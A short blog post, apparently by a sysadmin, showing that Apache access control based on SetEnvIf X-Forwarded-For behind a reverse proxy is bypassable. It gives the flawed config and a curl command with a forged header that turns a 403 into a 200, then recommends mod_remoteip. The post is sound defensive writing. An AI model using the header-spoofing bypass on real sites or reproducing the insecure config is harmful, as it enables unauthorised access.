Bypass mod_access when using a reverse proxy and X-Forwared-For
If you intend to use a reverse proxy in front of an apache webserver, the IP seen by apache is the one from the reverse proxy.
This breaks the access rules policies from apache2 (for instance `allow from 88.233.222.106`).
A proposed solution for this problem is the use of a `SetEnvIf` directive.
In pratice, this solution is not secured, because a malicious user can easilly craft an http header to add such a header.
For instance, here is the apache conf for a protected directory:
<Directory /path/to/protected/>
SetEnvIf X-Forwarded-For ^234\.22\.11\.6 trusted_from
allow from env=trusted_from
</Directory>
And here is a shell output using curl to prove it works.
~ $ curl -I http://myurl/protected/
HTTP/1.1 403 Forbidden
Server: nginx/1.2.1
Date: Tue, 01 Dec 2013 20:39:25 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
~ $ curl -H 'X-Forwarded-For: 234.22.11.6' -I http://myurl/protected/
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 01 Dec 2013 20:39:27 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
You may argue that you still have to know the allowed IP. This is true, but the source request does not come from the TCP packet, but from a (potentially) untrusted header.
rpaf is not an option, because it only works for log files.
But Apache 2.4 includes mod_remoteip which works like a charm. For Apache 2.2 users, a github project has ported this module for apache 2.2
Add new comment